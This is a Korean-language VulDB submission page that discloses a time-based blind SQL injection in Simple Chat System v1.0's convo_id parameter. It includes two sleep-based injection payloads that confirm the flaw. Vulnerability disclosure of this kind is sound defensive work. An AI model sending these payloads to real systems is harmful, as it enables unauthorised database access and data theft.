제출 #162963: Simple Chat System v1.0 /chat/ajax.php?action=read_msg POST parameter convo_id exists SQL injection vulnerability정보

제목Simple Chat System v1.0 /chat/ajax.php?action=read_msg POST parameter convo_id exists SQL injection vulnerability
설명Simple Chat System v1.0 has SQL injection. Vulnerability URL: /chat/ajax.php?action=read_msg POST parameter convo_id exists SQL injection vulnerability. Payload1: convo_id=1' and (select 2 from (select(sleep(10)))t) and 'q'='q&user_id=2 The response time is 10 seconds. Payload2: convo_id=1' and (select 2 from (select(sleep(15)))t) and 'q'='q&user_id=2 The response time is 15 seconds.
원천⚠️ https://github.com/sikii7/CVE/blob/main/SQL.md
사용자
 sikii (UID 47840)
제출2023. 05. 31. AM 08:39 (3 연령 ago)
모더레이션2023. 05. 31. AM 10:00 (1 hour later)
상태수락
VulDB 항목230348 [SourceCodester Simple Chat System 1.0 POST Parameter ajax.php?action=read_msg convo_id SQL 주입]
포인트들20

이전개요다음

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!